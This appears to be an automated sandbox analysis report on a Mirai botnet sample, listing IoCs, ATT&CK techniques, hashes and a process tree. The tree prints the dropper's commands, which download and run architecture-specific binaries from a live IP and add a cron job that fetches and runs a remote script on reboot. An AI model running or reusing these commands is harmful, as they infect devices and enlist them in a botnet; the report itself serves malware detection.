mirai | 8b41d5f588ba7f38a91c67da9a6fb04bcb51eb0788423e1e8a1c546dc8fc615a

Analysis

max time kernel
136s
max time network
140s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
30-12-2024 01:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
Size

610B
MD5

92d13edccd8d4b5832ee62c441c24785
SHA1

dbb27ddb5dca8aead2e72e887c24cfce68947a22
SHA256

8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f
SHA512

d3f9223e692eff6ec1e5067555f05bf676489959fddddf3f890afa8006ae0c27500d61fabfcff3d14d1f03acd0f573b1cd61a1ee78ce16e9da4b075a03cd606a

Score

10^/10

mirai botnet botnet defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1498	chmod
1503	chmod
1507	chmod
1511	chmod
1523	chmod
1492	chmod
1515	chmod
1519	chmod
1527	chmod
1529	sh

Executes dropped EXE 8 IoCs

ioc	pid	Process
/run/user/0/upnp	1499	upnp
/run/user/0/upnp	1504	upnp
/run/user/0/upnp	1508	upnp
/run/user/0/upnp	1512	upnp
/run/user/0/upnp	1516	upnp
/run/user/0/upnp	1520	upnp
/run/user/0/upnp	1524	upnp
/run/user/0/upnp	1528	upnp

Renames itself 1 IoCs

pid	Process
1528	upnp

Unexpected DNS network traffic destination 2 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	81.169.136.222
Destination IP	168.235.111.72

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.Yn8tgd	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	[watchdog/0]	1528	upnp

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/447/stat	killall
File opened for reading	/proc/701/stat	killall
File opened for reading	/proc/85/stat	killall
File opened for reading	/proc/168/stat	killall
File opened for reading	/proc/412/stat	killall
File opened for reading	/proc/24/stat	killall
File opened for reading	/proc/449/stat	killall
File opened for reading	/proc/1121/stat	killall
File opened for reading	/proc/514/stat	killall
File opened for reading	/proc/1076/cmdline	killall
File opened for reading	/proc/1177/stat	killall
File opened for reading	/proc/713/stat	killall
File opened for reading	/proc/713/cmdline	killall
File opened for reading	/proc/1096/cmdline	killall
File opened for reading	/proc/1135/cmdline	killall
File opened for reading	/proc/1472/stat	killall
File opened for reading	/proc/1478/stat	killall
File opened for reading	/proc/84/stat	killall
File opened for reading	/proc/161/stat	killall
File opened for reading	/proc/6/stat	killall
File opened for reading	/proc/15/cmdline	killall
File opened for reading	/proc/936/stat	killall
File opened for reading	/proc/1162/cmdline	killall
File opened for reading	/proc/34/stat	killall
File opened for reading	/proc/156/stat	killall
File opened for reading	/proc/filesystems	killall
File opened for reading	/proc/83/stat	killall
File opened for reading	/proc/1117/cmdline	killall
File opened for reading	/proc/936/cmdline	killall
File opened for reading	/proc/1085/stat	killall
File opened for reading	/proc/1125/cmdline	killall
File opened for reading	/proc/1168/stat	killall
File opened for reading	/proc/15/stat	killall
File opened for reading	/proc/461/stat	killall
File opened for reading	/proc/955/stat	killall
File opened for reading	/proc/1331/stat	killall
File opened for reading	/proc/1172/stat	killall
File opened for reading	/proc/1182/stat	killall
File opened for reading	/proc/31/stat	killall
File opened for reading	/proc/1034/stat	killall
File opened for reading	/proc/506/stat	killall
File opened for reading	/proc/593/stat	killall
File opened for reading	/proc/667/stat	killall
File opened for reading	/proc/35/stat	killall
File opened for reading	/proc/257/cmdline	killall
File opened for reading	/proc/560/stat	killall
File opened for reading	/proc/943/stat	killall
File opened for reading	/proc/153/stat	killall
File opened for reading	/proc/1474/stat	killall
File opened for reading	/proc/1102/stat	killall
File opened for reading	/proc/80/stat	killall
File opened for reading	/proc/704/stat	killall
File opened for reading	/proc/1008/stat	killall
File opened for reading	/proc/1321/cmdline	killall
File opened for reading	/proc/1179/stat	killall
File opened for reading	/proc/1139/stat	killall
File opened for reading	/proc/155/stat	killall
File opened for reading	/proc/344/stat	killall
File opened for reading	/proc/1130/stat	killall
File opened for reading	/proc/11/stat	killall
File opened for reading	/proc/19/stat	killall
File opened for reading	/proc/79/cmdline	killall
File opened for reading	/proc/160/stat	killall
File opened for reading	/proc/1170/stat	killall

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1514	wget
1516	upnp

Writes file to shm directory 1 IoCs

Malware can drop malicious files in the shm directory which will run directly from RAM.

description	ioc	Process
File opened for modification	/dev/shm/.a	8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.a	8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown

/tmp/8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
/tmp/8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
1⤵
- Writes file to shm directory
- Writes file to tmp directory
PID:1478
- /usr/bin/killall
  killall -9 dvrLocker
  2⤵
  - Reads runtime system information
  PID:1479
- /usr/bin/cut
  cut -d " " -f 2
  2⤵
  PID:1485
- /bin/grep
  grep -v noexe
  2⤵
  PID:1484
- /bin/grep
  grep rw
  2⤵
  PID:1483
- /bin/grep
  grep tmpfs
  2⤵
  PID:1482
- /bin/cat
  cat /proc/mounts
  2⤵
  PID:1481
- /bin/rm
  rm -rf .a .f
  2⤵
  PID:1486
- /bin/rm
  rm -rf .a .f
  2⤵
  PID:1487
- /bin/rm
  rm -rf .a .f
  2⤵
  PID:1488
- /bin/cp
  cp /proc/self/exe .f
  2⤵
  PID:1490
- /bin/chmod
  chmod 777 .f
  2⤵
  - File and Directory Permissions Modification
  PID:1492
- /bin/rm
  rm -rf upnp
  2⤵
  PID:1493
- /usr/bin/wget
  wget http://103.188.82.218/t/arm -O -
  2⤵
  PID:1494
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:1498
- /run/user/0/upnp
  ./upnp tplink.arm
  2⤵
  - Executes dropped EXE
  PID:1499
- /usr/bin/wget
  wget http://103.188.82.218/t/arm5 -O -
  2⤵
  PID:1501
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:1503
- /run/user/0/upnp
  ./upnp tplink.arm5
  2⤵
  - Executes dropped EXE
  PID:1504
- /usr/bin/wget
  wget http://103.188.82.218/t/arm6 -O -
  2⤵
  PID:1506
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:1507
- /run/user/0/upnp
  ./upnp tplink.arm6
  2⤵
  - Executes dropped EXE
  PID:1508
- /usr/bin/wget
  wget http://103.188.82.218/t/arm6 -O -
  2⤵
  PID:1510
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /run/user/0/upnp
  ./upnp tplink.arm6
  2⤵
  - Executes dropped EXE
  PID:1512
- /usr/bin/wget
  wget http://103.188.82.218/t/mips -O -
  2⤵
  - System Network Configuration Discovery
  PID:1514
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:1515
- /run/user/0/upnp
  ./upnp tplink.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1516
- /usr/bin/wget
  wget http://103.188.82.218/t/mpsl -O -
  2⤵
  PID:1518
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /run/user/0/upnp
  ./upnp tplink.mpsl
  2⤵
  - Executes dropped EXE
  PID:1520
- /usr/bin/wget
  wget http://103.188.82.218/t/ppc -O -
  2⤵
  PID:1522
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:1523
- /run/user/0/upnp
  ./upnp tplink.ppc
  2⤵
  - Executes dropped EXE
  PID:1524
- /usr/bin/wget
  wget http://103.188.82.218/t/x86 -O -
  2⤵
  PID:1526
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:1527
- /run/user/0/upnp
  ./upnp tplink.x86
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Changes its process name
  PID:1528
- - /bin/sh
    sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
    3⤵
    - File and Directory Permissions Modification
    PID:1529
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:1531
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:1532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/run/user/0/.f

Filesize
138KB

MD5
f7d53f25b67715fd4959eb7787de7902

SHA1
27860d9e8de0d83600fdbb4e8734af72fa638e50

SHA256
007d90bd141b2cdbd3cbc5e5f472b3144d122440c73a46d58ee61df2dd71e56e

SHA512
14283c5f84a96eac1a8bcd495c52105dbef9bb0fe0404dde3e5eb7531ab54bedd83e4ccfadb23c5572533979887aca54745854d3bf05cc30306e23b9713b5a3c

Download Submit
/run/user/0/upnp

Filesize
73KB

MD5
f812a7b3a877f717eb6e54b843b41848

SHA1
21ee67d9a9b638621646e1b57fdc0f1eb0bdfa25

SHA256
9a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560

SHA512
c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732

Download Submit
/run/user/0/upnp

Filesize
85KB

MD5
d8b9115310ca0429f6ec2473696156a2

SHA1
5497d765ad0b6ad6ed2204338faecd9671f6a60c

SHA256
7f089801a37f1d9a83a5103c8f9b1c6fc00f9ce699cb812cc23704aea8d46c8c

SHA512
a3adc2f2a36bdf40bda9e592f03bf51c3a3e7954fbeb8e52d1517537c72efc7df2d22e8be0d1ac85b768aacb45bd77cabb0ced0885ac96c17252b8af63cdb664

Download Submit
/run/user/0/upnp

Filesize
99KB

MD5
559f129d380ad1cfb60792c6b2dc3d32

SHA1
3997a0fc0bd5958783f1751364ec407c5b170adc

SHA256
fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d

SHA512
9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

Download Submit
/run/user/0/upnp

Filesize
100KB

MD5
6eacc766bbc8a29a3c5b247214052e51

SHA1
c214bd410358cb95ca8f71f90780a8d064319683

SHA256
cb727a0517434be1c4b64e19182888e449be71fadcca1a6bfb60fc8791d1d13d

SHA512
e3cdf8154cbd7b6769533eb3c0aebec3a9e62242a218068a7105b0f0df023cb42c2366f48f720a4534b6265cc8997617e947cb0ae9a0bb04394754185819c0a9

Download Submit
/run/user/0/upnp

Filesize
77KB

MD5
d09db60a70d5b53b5b53ad39476fd7e8

SHA1
73a75e5e8200f77d857a7256cc0979077e29241d

SHA256
36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165

SHA512
ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

Download Submit
/var/spool/cron/crontabs/tmp.Yn8tgd

Filesize
306B

MD5
cd98a9d4e021576c77833ca8cae82556

SHA1
36c5ebeeed4408a3f816f9772c4a6f3df5704986

SHA256
7e35660bc8b2d4ed06585ccb2e9d2ca4b1be6d201aaeb210bc93a64c80ecfbe9

SHA512
9902c31d4a24d8b3e0ccf4934348614233d44a11eeb72144f79dbc4bdf1a208b6948fb016a761f316358b051f78cb004276476320873a7954452a0ac06a42eb7

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads